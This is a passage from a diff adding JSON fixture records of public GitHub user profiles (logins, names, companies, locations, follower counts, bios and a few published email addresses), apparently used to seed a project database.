"2012-04-02T23:46:24Z", + "updated_at": "2024-06-21T23:48:08Z", + "node_id": "MDQ6VXNlcjE2MDY0ODA=", + "bio": "I'm a hacker from back when hacking was cool! Got a BSc in Computer Science and another in Biotechnology, worked at AWS for 4+ years, and I'm at Netskrt.io!", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2401, + "fields": { + "nest_created_at": "2024-09-12T01:24:06.757Z", + "nest_updated_at": "2024-09-12T01:24:06.757Z", + "name": "", + "login": "jrobertsz366", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50830420?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-05-20T11:31:26Z", + "updated_at": "2022-04-08T02:45:35Z", + "node_id": "MDQ6VXNlcjUwODMwNDIw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2402, + "fields": { + "nest_created_at": "2024-09-12T01:24:09.605Z", + "nest_updated_at": "2024-09-12T01:24:09.605Z", + "name": "Shivam", + "login": "shivam15", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8672610?v=4", + "company": "", + "location": "Hyderabad", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2014-09-05T20:29:51Z", + "updated_at": "2024-09-03T06:12:17Z", + "node_id": "MDQ6VXNlcjg2NzI2MTA=", + "bio": "\r\nEngineer\r\n", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2403, + "fields": { + "nest_created_at": "2024-09-12T01:24:11.286Z", + "nest_updated_at": "2024-09-12T01:24:11.286Z", + "name": "Stefan-Alexandru Rentea", + "login": "stefan574", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13134474?v=4", + "company": "", + "location": "Bucharest, Romania", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2015-07-01T11:40:24Z", + "updated_at": "2021-11-29T07:52:31Z", + "node_id": "MDQ6VXNlcjEzMTM0NDc0", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2404, + "fields": { + "nest_created_at": "2024-09-12T01:24:12.978Z", + "nest_updated_at": "2024-09-12T01:24:12.978Z", + "name": "Henrik Sachse", + "login": "0x7d7b", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56216308?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 3, + "public_gists_count": 8, + "public_repositories_count": 7, + "created_at": "2019-10-06T07:13:25Z", + "updated_at": "2024-09-03T13:59:49Z", + "node_id": "MDQ6VXNlcjU2MjE2MzA4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2405, + "fields": { + "nest_created_at": "2024-09-12T01:24:17.170Z", + "nest_updated_at": "2024-09-16T22:28:49.197Z", + "name": "Rich DiCroce", + "login": "rdicroce", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1458922?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2012-02-21T21:06:09Z", + "updated_at": "2024-04-09T19:09:12Z", + "node_id": "MDQ6VXNlcjE0NTg5MjI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2406, + "fields": { + "nest_created_at": "2024-09-12T01:24:18.817Z", + "nest_updated_at": "2024-09-12T01:24:18.817Z", + "name": "", + "login": "allwin101", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2221330?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2012-08-26T09:32:11Z", + "updated_at": "2024-06-07T09:25:53Z", + "node_id": "MDQ6VXNlcjIyMjEzMzA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2407, + "fields": { + "nest_created_at": "2024-09-12T01:24:20.554Z", + "nest_updated_at": "2024-09-12T01:24:20.554Z", + "name": "Alfredo Deza", + "login": "alfredodeza", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/317847?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 800, + "public_gists_count": 47, + "public_repositories_count": 223, + "created_at": "2010-06-29T19:34:02Z", + "updated_at": "2024-09-10T23:19:57Z", + "node_id": "MDQ6VXNlcjMxNzg0Nw==", + "bio": "Author, technologist, Olympian, former pro-athlete. ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2408, + "fields": { + "nest_created_at": "2024-09-12T01:24:23.081Z", + "nest_updated_at": "2024-09-12T01:24:23.081Z", + "name": "", + "login": "theoctopus0", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9120266?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-10-09T19:44:36Z", + "updated_at": "2021-08-27T06:50:07Z", + "node_id": "MDQ6VXNlcjkxMjAyNjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2409, + "fields": { + "nest_created_at": "2024-09-12T01:24:25.165Z", + "nest_updated_at": "2024-09-22T19:42:53.725Z", + "name": "Szasza Palmer", + "login": "Szasza", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/911466?v=4", + "company": "Holocron One", + "location": "Canberra, Australia", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2011-07-12T23:15:39Z", + "updated_at": "2024-07-22T05:52:10Z", + "node_id": "MDQ6VXNlcjkxMTQ2Ng==", + "bio": "Systems Engineer / Software Architect", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2410, + "fields": { + "nest_created_at": "2024-09-12T01:24:26.908Z", + "nest_updated_at": "2024-09-22T19:42:35.506Z", + "name": "Alex SZAKALY", + "login": "alex1989hu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10764100?v=4", + "company": "", + "location": "Zürich, Switzerland", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 16, + "created_at": "2015-01-29T21:27:52Z", + "updated_at": "2024-08-29T16:15:05Z", + "node_id": "MDQ6VXNlcjEwNzY0MTAw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2411, + "fields": { + "nest_created_at": "2024-09-12T01:24:28.198Z", + "nest_updated_at": "2024-09-22T19:42:53.056Z", + "name": "", + "login": "dfn-certling", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2751709?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2012-11-08T15:34:35Z", + "updated_at": "2024-08-23T12:54:02Z", + "node_id": "MDQ6VXNlcjI3NTE3MDk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2412, + "fields": { + "nest_created_at": "2024-09-12T01:24:29.897Z", + "nest_updated_at": "2024-09-12T01:24:29.897Z", + "name": "Martin Hock", + "login": "mnhock", + "email": "martin.hock.de@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5895296?v=4", + "company": "", + "location": "Nuremberg, Germany", + "collaborators_count": 0, + "following_count": 66, + "followers_count": 50, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2013-11-09T11:06:55Z", + "updated_at": "2024-09-09T08:18:24Z", + "node_id": "MDQ6VXNlcjU4OTUyOTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "mnhocktweets" + } +}, +{ + "model": "github.user", + "pk": 2413, + "fields": { + "nest_created_at": "2024-09-12T01:24:31.173Z", + "nest_updated_at": "2024-09-22T19:42:20.457Z", + "name": "Ronny Perinke", + "login": "sephiroth-j", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23166289?v=4", + "company": "@InversoGmbH", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2016-10-31T10:08:48Z", + "updated_at": "2024-09-12T18:02:50Z", + "node_id": "MDQ6VXNlcjIzMTY2Mjg5", + "bio": "Software architect and full-stack developer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2414, + "fields": { + "nest_created_at": "2024-09-12T01:24:32.473Z", + "nest_updated_at": "2024-09-12T01:24:32.474Z", + "name": "Lucas Bechholtz", + "login": "luhahn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61747797?v=4", + "company": "Novum-RGI", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2020-03-03T15:19:51Z", + "updated_at": "2024-08-25T07:34:16Z", + "node_id": "MDQ6VXNlcjYxNzQ3Nzk3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2415, + "fields": { + "nest_created_at": "2024-09-12T01:24:33.795Z", + "nest_updated_at": "2024-09-12T01:24:33.796Z", + "name": "", + "login": "mgoblue0970", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/74521411?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-11-16T03:13:17Z", + "updated_at": "2020-11-16T03:13:17Z", + "node_id": "MDQ6VXNlcjc0NTIxNDEx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2416, + "fields": { + "nest_created_at": "2024-09-12T01:24:38.371Z", + "nest_updated_at": "2024-09-12T01:24:38.371Z", + "name": "Marene Joecel Sembrano", + "login": "mjbsembrano", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/54050164?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2019-08-13T02:30:09Z", + "updated_at": "2024-09-04T11:51:38Z", + "node_id": "MDQ6VXNlcjU0MDUwMTY0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2417, + "fields": { + "nest_created_at": "2024-09-12T01:24:42.078Z", + "nest_updated_at": "2024-09-12T01:24:42.078Z", + "name": "Nille af Ekenstam", + "login": "nille", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1552156?v=4", + "company": "Amazon Web Services", + "location": "Stockholm, Sweden", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 3, + "public_repositories_count": 22, + "created_at": "2012-03-19T09:13:19Z", + "updated_at": "2024-06-25T11:04:34Z", + "node_id": "MDQ6VXNlcjE1NTIxNTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "nilrod" + } +}, +{ + "model": "github.user", + "pk": 2418, + "fields": { + "nest_created_at": "2024-09-12T01:24:55.329Z", + "nest_updated_at": "2024-09-12T01:24:55.329Z", + "name": "", + "login": "steffenolsen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78483374?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-02-03T12:30:39Z", + "updated_at": "2022-09-05T19:45:49Z", + "node_id": "MDQ6VXNlcjc4NDgzMzc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2419, + "fields": { + "nest_created_at": "2024-09-12T01:24:58.280Z", + "nest_updated_at": "2024-09-12T01:24:59.542Z", + "name": "Scott Chapman", + "login": "ScottChapman", + "email": "scott@chapman.us", + "avatar_url": "https://avatars.githubusercontent.com/u/1517892?v=4", + "company": "@IBM", + "location": "USA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 4, + "public_repositories_count": 54, + "created_at": "2012-03-08T21:44:51Z", + "updated_at": "2023-12-20T16:17:28Z", + "node_id": "MDQ6VXNlcjE1MTc4OTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2420, + "fields": { + "nest_created_at": "2024-09-12T01:25:04.168Z", + "nest_updated_at": "2024-09-12T02:39:41.173Z", + "name": "Matthias Kammerinke", + "login": "bugbouncer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9417474?v=4", + "company": "Schenker AG", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-10-27T13:42:59Z", + "updated_at": "2022-02-08T06:42:55Z", + "node_id": "MDQ6VXNlcjk0MTc0NzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "bugbouncer" + } +}, +{ + "model": "github.user", + "pk": 2421, + "fields": { + "nest_created_at": "2024-09-12T01:25:05.503Z", + "nest_updated_at": "2024-09-12T01:25:05.503Z", + "name": "Ed Macke", + "login": "edmacke", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26488296?v=4", + "company": "Lincoln Financial Group", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-03-17T15:54:51Z", + "updated_at": "2021-03-22T19:07:29Z", + "node_id": "MDQ6VXNlcjI2NDg4Mjk2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2422, + "fields": { + "nest_created_at": "2024-09-12T01:25:08.479Z", + "nest_updated_at": "2024-09-12T01:25:29.102Z", + "name": "Ben Verlinden", + "login": "verlindb", + "email": "benverlinden30@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29273350?v=4", + "company": "Ordina Belgium", + "location": "Mechelen, Belgium", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-06-08T08:28:29Z", + "updated_at": "2024-06-06T06:54:28Z", + "node_id": "MDQ6VXNlcjI5MjczMzUw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2423, + "fields": { + "nest_created_at": "2024-09-12T01:25:13.067Z", + "nest_updated_at": "2024-09-12T01:25:13.067Z", + "name": "vines", + "login": "vineshub", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36988708?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-03-02T11:07:01Z", + "updated_at": "2024-04-01T09:51:44Z", + "node_id": "MDQ6VXNlcjM2OTg4NzA4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2424, + "fields": { + "nest_created_at": "2024-09-12T01:25:13.909Z", + "nest_updated_at": "2024-09-12T01:25:13.909Z", + "name": "", + "login": "aleproscia", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5622591?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2013-10-06T13:17:04Z", + "updated_at": "2024-09-01T09:39:39Z", + "node_id": "MDQ6VXNlcjU2MjI1OTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2425, + "fields": { + "nest_created_at": "2024-09-12T01:25:16.943Z", + "nest_updated_at": "2024-09-12T01:25:16.943Z", + "name": "Ibrahim", + "login": "brvheem", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29885058?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-07-04T07:37:38Z", + "updated_at": "2022-03-13T08:33:47Z", + "node_id": "MDQ6VXNlcjI5ODg1MDU4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2426, + "fields": { + "nest_created_at": "2024-09-12T01:25:22.015Z", + "nest_updated_at": "2024-09-12T01:25:22.015Z", + "name": "", + "login": "dmitryoelfimov", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72246759?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-10-02T06:52:39Z", + "updated_at": "2023-01-10T13:56:32Z", + "node_id": "MDQ6VXNlcjcyMjQ2NzU5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2427, + "fields": { + "nest_created_at": "2024-09-12T01:25:25.325Z", + "nest_updated_at": "2024-09-12T01:25:25.325Z", + "name": "", + "login": "rsumit", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32129881?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-09-20T11:28:03Z", + "updated_at": "2024-07-08T12:48:21Z", + "node_id": "MDQ6VXNlcjMyMTI5ODgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2428, + "fields": { + "nest_created_at": "2024-09-12T01:25:30.410Z", + "nest_updated_at": "2024-09-12T01:25:32.062Z", + "name": "", + "login": "Kiiv", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/695160?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2011-03-28T14:02:32Z", + "updated_at": "2024-07-17T17:13:17Z", + "node_id": "MDQ6VXNlcjY5NTE2MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2429, + "fields": { + "nest_created_at": "2024-09-12T01:25:36.754Z", + "nest_updated_at": "2024-09-12T01:25:36.754Z", + "name": "", + "login": "icezhaoL", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14086616?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2015-09-02T05:21:12Z", + "updated_at": "2024-07-19T07:10:26Z", + "node_id": "MDQ6VXNlcjE0MDg2NjE2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2430, + "fields": { + "nest_created_at": "2024-09-12T01:25:40.480Z", + "nest_updated_at": "2024-09-16T22:28:27.629Z", + "name": "", + "login": "Valicia", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/88562304?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-08-06T21:52:54Z", + "updated_at": "2021-08-15T23:28:29Z", + "node_id": "MDQ6VXNlcjg4NTYyMzA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2431, + "fields": { + "nest_created_at": "2024-09-12T01:25:41.753Z", + "nest_updated_at": "2024-09-12T01:25:41.753Z", + "name": "Dmitry Vershinin", + "login": "keni0k", + "email": "dima-vers0@rambler.ru", + "avatar_url": "https://avatars.githubusercontent.com/u/5165967?v=4", + "company": "", + "location": "Novosibirsk, Russia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2013-08-05T12:58:49Z", + "updated_at": "2024-01-03T22:59:42Z", + "node_id": "MDQ6VXNlcjUxNjU5Njc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2432, + "fields": { + "nest_created_at": "2024-09-12T01:25:45.520Z", + "nest_updated_at": "2024-09-12T01:25:45.520Z", + "name": "Nilesh Gaikwad", + "login": "Nilesh0101", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31848932?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-09-11T10:51:32Z", + "updated_at": "2023-02-09T09:25:17Z", + "node_id": "MDQ6VXNlcjMxODQ4OTMy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2433, + "fields": { + "nest_created_at": "2024-09-12T01:25:47.181Z", + "nest_updated_at": "2024-09-12T01:25:47.181Z", + "name": "Maddie Burbage", + "login": "MaddieBurbage", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43120781?v=4", + "company": "", + "location": "Seattle, Washington", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2018-09-09T22:00:27Z", + "updated_at": "2024-08-09T03:19:39Z", + "node_id": "MDQ6VXNlcjQzMTIwNzgx", + "bio": "UW PhD Student", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2434, + "fields": { + "nest_created_at": "2024-09-12T01:25:55.649Z", + "nest_updated_at": "2024-09-16T22:28:28.637Z", + "name": "Davy Durham", + "login": "ddurham2", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4805134?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 34, + "created_at": "2013-06-24T17:48:05Z", + "updated_at": "2024-09-02T11:24:23Z", + "node_id": "MDQ6VXNlcjQ4MDUxMzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2435, + "fields": { + "nest_created_at": "2024-09-12T01:26:01.207Z", + "nest_updated_at": "2024-09-12T01:26:01.207Z", + "name": "", + "login": "sommersol", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24252783?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2016-11-29T16:14:05Z", + "updated_at": "2024-04-30T08:37:52Z", + "node_id": "MDQ6VXNlcjI0MjUyNzgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2436, + "fields": { + "nest_created_at": "2024-09-12T01:26:04.593Z", + "nest_updated_at": "2024-09-12T01:26:04.593Z", + "name": "Alexey Beloglazov", + "login": "beloglazov91", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1752241?v=4", + "company": "@systemseed ", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 2, + "created_at": "2012-05-18T12:29:22Z", + "updated_at": "2024-07-20T20:56:17Z", + "node_id": "MDQ6VXNlcjE3NTIyNDE=", + "bio": "Apart from building awesome projects, I like to travel, motorcycles, tasty food, and good drinks.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2437, + "fields": { + "nest_created_at": "2024-09-12T01:26:07.492Z", + "nest_updated_at": "2024-09-12T01:33:02.089Z", + "name": "", + "login": "mawl", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5493374?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2013-09-19T10:23:28Z", + "updated_at": "2024-04-11T09:51:47Z", + "node_id": "MDQ6VXNlcjU0OTMzNzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2438, + "fields": { + "nest_created_at": "2024-09-12T01:26:09.570Z", + "nest_updated_at": "2024-09-22T18:48:30.785Z", + "name": "Artem Smotrakov", + "login": "artem-smotrakov", + "email": "artem.smotrakov@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/19523081?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 92, + "public_gists_count": 76, + "public_repositories_count": 64, + "created_at": "2016-05-23T01:32:26Z", + "updated_at": "2024-08-23T11:39:22Z", + "node_id": "MDQ6VXNlcjE5NTIzMDgx", + "bio": "", + "is_hireable": false, + "twitter_username": "artem_smotrakov" + } +}, +{ + "model": "github.user", + "pk": 2439, + "fields": { + "nest_created_at": "2024-09-12T01:26:11.635Z", + "nest_updated_at": "2024-09-12T01:26:11.635Z", + "name": "", + "login": "33yan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14202004?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 5, + "public_gists_count": 2, + "public_repositories_count": 0, + "created_at": "2015-09-09T15:53:47Z", + "updated_at": "2024-07-27T02:47:10Z", + "node_id": "MDQ6VXNlcjE0MjAyMDA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2440, + "fields": { + "nest_created_at": "2024-09-12T01:26:13.285Z", + "nest_updated_at": "2024-09-12T01:26:13.285Z", + "name": "Mohamed Harrouni", + "login": "AL1010237", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/83699002?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-05-05T09:14:13Z", + "updated_at": "2023-06-27T12:39:18Z", + "node_id": "MDQ6VXNlcjgzNjk5MDAy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2441, + "fields": { + "nest_created_at": "2024-09-12T01:26:14.510Z", + "nest_updated_at": "2024-09-12T01:26:14.510Z", + "name": "Daniel Ferreira", + "login": "daniel-anova", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71904581?v=4", + "company": "ANOVA", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 13, + "created_at": "2020-09-25T20:45:30Z", + "updated_at": "2024-07-10T23:24:31Z", + "node_id": "MDQ6VXNlcjcxOTA0NTgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2442, + "fields": { + "nest_created_at": "2024-09-12T01:26:17.490Z", + "nest_updated_at": "2024-09-12T01:42:19.002Z", + "name": "Kévin PEREZ", + "login": "Whisper40", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30440458?v=4", + "company": "CAGIP", + "location": "Montpellier, France", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 31, + "created_at": "2017-07-25T15:10:39Z", + "updated_at": "2024-08-11T11:39:23Z", + "node_id": "MDQ6VXNlcjMwNDQwNDU4", + "bio": "DevOps Engineer at CAGIP", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2443, + "fields": { + "nest_created_at": "2024-09-12T01:26:18.764Z", + "nest_updated_at": "2024-09-12T01:27:01.396Z", + "name": "Matthias Schiebel", + "login": "CompartMSL", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39903234?v=4", + "company": "Compart AG", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2018-06-04T08:48:28Z", + "updated_at": "2024-07-11T09:57:59Z", + "node_id": "MDQ6VXNlcjM5OTAzMjM0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2444, + "fields": { + "nest_created_at": "2024-09-12T01:26:20.532Z", + "nest_updated_at": "2024-09-12T01:26:23.488Z", + "name": "Paul Hammant", + "login": "paul-hammant", + "email": "paul@hammant.org", + "avatar_url": "https://avatars.githubusercontent.com/u/82182?v=4", + "company": "Paul Hammant Delivery Optimization", + "location": "Edinburgh", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 484, + "public_gists_count": 21, + "public_repositories_count": 282, + "created_at": "2009-05-07T20:05:09Z", + "updated_at": "2024-04-19T18:02:04Z", + "node_id": "MDQ6VXNlcjgyMTgy", + "bio": "Startup CTO, Trunk-Based Development expert, ex ThoughtWorker", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2445, + "fields": { + "nest_created_at": "2024-09-12T01:26:22.202Z", + "nest_updated_at": "2024-09-12T01:26:22.202Z", + "name": "nathan roy", + "login": "dormine", + "email": "solal.roy@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/23026612?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2016-10-24T08:17:06Z", + "updated_at": "2023-08-23T15:14:48Z", + "node_id": "MDQ6VXNlcjIzMDI2NjEy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2446, + "fields": { + "nest_created_at": "2024-09-12T01:26:26.851Z", + 